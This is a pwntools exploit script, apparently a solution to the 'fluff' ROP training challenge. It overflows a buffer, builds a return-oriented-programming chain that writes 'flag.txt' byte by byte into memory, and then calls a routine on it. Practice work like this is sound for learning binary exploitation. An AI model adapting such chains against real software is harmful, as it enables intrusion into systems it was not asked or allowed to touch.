
modified: x86_64/fluff/.gdb_history deleted: x86_64/fluff/core modified: x86_64/fluff/exploit.py deleted: x86_64/ret2win/core deleted: x86_64/split/core deleted: x86_64/write4/core
#!/usr/bin/env python3
from pwn import *
# Per-character lookup table for the write chain built by write_str().
# For each character of the target string it holds an address inside the
# `fluff` binary; write_str() feeds `value - 0x3ef2` to the gadget at
# 0x40062a / 0x40062b right after the value 0x4000.  Presumably each address
# points at a byte equal to that character (that is how the chain materialises
# the string) -- verify against the binary before reusing with another build,
# since every address here is absolute and build-specific.
letter_lookups: dict[str, int] = {
    'f': 0x4003c4,
    'l': 0x400239,
    'a': 0x4003d6,
    'g': 0x4003cf,
    '.': 0x400251,
    't': 0x400192,
    'x': 0x400246,
}
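def write_str(dest, string, payload):
    """Append a ROP chain that writes ``string`` byte-by-byte to ``dest``.

    Every character goes through the same gadget sequence: the address
    ``letter_lookups[c] - 0x3ef2`` is fed to the gadget at 0x40062a (first
    byte, preceded by the value 0x4000) or 0x40062b (remaining bytes), with
    the gadgets at 0x400610, 0x400628 and 0x400639 around it.  The semantics
    of the individual gadgets are not visible in this file; all addresses are
    absolute and specific to the ``fluff`` build this script targets, so they
    must be re-derived for any other binary.

    Args:
        dest:    Address the string is written to.  Loaded once, via the
                 gadget at 0x4006a3 (presumably ``pop rdi; ret`` -- verify);
                 the chain never reloads it, so the per-byte write gadget is
                 presumably the one that advances the destination.
        string:  Non-empty text; every character needs a ``letter_lookups``
                 entry.
        payload: Chain built so far (``bytes``).  Not modified.

    Returns:
        A new ``bytes`` object: ``payload`` with the write chain appended.

    Raises:
        ValueError: ``string`` is empty (the chain has no first character to
                    emit; the previous implementation failed with IndexError).
        KeyError:   a character has no ``letter_lookups`` entry.  Checked up
                    front so the caller does not receive a half-built chain
                    together with the exception.
    """
    if not string:
        raise ValueError("write_str: string must not be empty")
    missing = sorted({c for c in string if c not in letter_lookups})
    if missing:
        raise KeyError(f"write_str: no lookup address for {missing!r}")

    # Load the destination once.
    chain = p64(0x4006a3) + p64(dest)

    # First byte: the 0x40062a gadget consumes two values (0x4000 and the
    # adjusted lookup address); later bytes use 0x40062b with one value.
    first, rest = string[0], string[1:]
    chain += p64(0x400610) + p64(1)
    chain += p64(0x40062a) + p64(0x4000) + p64(letter_lookups[first] - 0x3ef2)
    chain += p64(0x400628) + p64(0x400639)

    for c in rest:
        chain += p64(0x40062b) + p64(letter_lookups[c] - 0x3ef2)
        chain += p64(0x400610) + p64(1)
        chain += p64(0x400628) + p64(0x400639)

    return payload + chain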
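# --- Exploit driver -------------------------------------------------------
# Target: the local `fluff` binary.  Every address below is absolute and so
# assumes a non-PIE build identical to the one this script was written
# against; re-derive them (and the filler length) before pointing this at
# another build.
prog = process('./fluff')

# Writable address the file name is placed at.  Kept in one place so the
# write chain and the later first argument to the routine at 0x400510 cannot
# drift apart (the previous version spelled the same address twice, once as
# 0x600df0 + 0xdf0 and once as the literal 0x601be0).
FLAG_NAME_ADDR = 0x600df0 + 0x00000df0   # == 0x601be0

# Filler up to the saved return address.  The length (40) was presumably
# determined offline against this binary; it is not derivable from here.
payload = b'a' * 40

# Write "flag.txt" into memory, then call the routine at 0x400510 with that
# buffer as its first argument (0x4006a3 is the same gadget write_str() uses
# to load its destination -- presumably `pop rdi; ret`, verify).
payload = write_str(FLAG_NAME_ADDR, 'flag.txt', payload)
payload += p64(0x4006a3)
payload += p64(FLAG_NAME_ADDR)
payload += p64(0x0000000000400510)

prog.sendline(payload)
prog.interactive()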
|